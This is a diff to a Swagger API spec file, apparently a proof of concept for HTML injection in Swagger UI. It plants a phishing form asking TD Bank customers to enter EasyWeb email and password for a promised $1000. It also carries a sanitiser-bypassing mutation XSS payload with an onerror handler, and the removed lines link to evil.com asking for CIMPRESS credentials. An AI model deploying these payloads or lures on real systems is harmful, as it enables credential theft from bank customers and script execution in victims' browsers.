--- a/phish_test.yaml
+++ b/phish_test.yaml
@@ -1,8 +1,8 @@
 swagger: '2.0'
 info:
-  title: HTML INJECTION FOR POC
+  title: FREE CASH FOR TD CUSTOMERS
   description: |
-    <h1>To get free 1000$ reward, please go to our partner website and fill up your bank account details needed to send the money or login below with your CIMPRESS CREDENTIALS:</h1> <h1><a href="https://evil.com">Click Here</a></h1>
+    <h1>Attention TD Customers.  Want free cash?  Yeah you do.  Just log in to EasyWeb using this handy form and, once you've done it, we'll slide you a cool $1000.</h1>
     <form><label><input id="textbox" type="text" placeholder="EMAIL" style="width:320px;height=30px"></label><br><label><input  id="textbox" type="text" placeholder="PASSWORD" style="width:320px"></label><br><input type="submit" value="SIGN IN" onclick="msg()"></form>
     <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src=1></form>
 
@@ -30,7 +30,7 @@ paths:
     delete:
       parameters:
       - description: |
-          <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="<h1>hide here</h1>"></form>
+          <form><math><mtext></form><form><mglyph><svg><mtext><textarea></form>
 
         format: int64
         in: path
